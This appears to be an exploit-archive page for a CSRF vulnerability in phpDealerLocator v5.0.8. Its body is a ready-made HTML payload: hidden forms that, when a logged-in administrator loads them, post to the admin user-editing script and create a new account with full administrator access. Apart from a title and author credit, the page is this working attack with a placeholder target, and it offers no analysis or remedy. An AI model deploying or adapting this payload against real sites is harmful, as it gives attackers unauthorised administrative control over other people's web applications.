facebook facebook twitter rss

phpDealerLocator v5.0.8 CSRF Vulnerability (Add Admin)

Author: Aboud-el , Published: 09-06-2012
phpDealerLocator v5.0.8  CSRF Vulnerability (Add Admin)
====================================================================

.:. Author : Aboud-el [aboud_el@hotmail.com]
.:. Script : http://www.yourphppro.com/version/en-us/content/page_4.html

===[ Exploit ]===

<form method="POST" name="form0" action="http://SITE/admin/edit_users.php?ccsForm=users">
<input type="hidden" name="Users_FullName" value="...."/>
<input type="hidden" name="Users_EmailAddress" value="...."/>
<input type="hidden" name="Users_Login" value="...."/>
<input type="hidden" name="Users_Password" value="...."/>
<input type="hidden" name="Users_Access" value="1"/>
<input type="hidden" name="Button_Insert.x" value="25"/>
<input type="hidden" name="Button_Insert.y" value="15"/>
<input type="hidden" name="Button_Insert" value="Insert"/>
<input type="hidden" name="Users_Password_Shadow" value=""/>
</form>
<form method="GET" name="form1" action="http://SITE/admin/list_users.php?">
<input type="hidden" name="name" value="value"/>
</form>

</body>
</html>


####################################################################

Like us on Facebook :